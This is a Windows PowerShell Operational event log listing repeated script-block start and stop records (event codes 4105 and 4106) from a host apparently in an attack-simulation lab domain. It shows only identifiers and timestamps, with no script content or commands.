ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477015
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477014
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477013
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477012
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477011
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477010
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477009
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477008
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477007
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477006
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477005
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477004
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477003
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477002
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477001
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477000
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476999
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476998
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476997
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476996
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476995
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476994
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476993
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476992
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476991
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476990
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476989
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476988
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476987
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476986
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476985
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476984
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476983
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476982
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476981
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476980
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476979
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476978
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476977
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476976
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476975
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476974
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476973
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476972
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476971
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476970
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476969
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476968
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476967
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476966
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476965
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476964
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476963
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476962
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476961
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476960
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
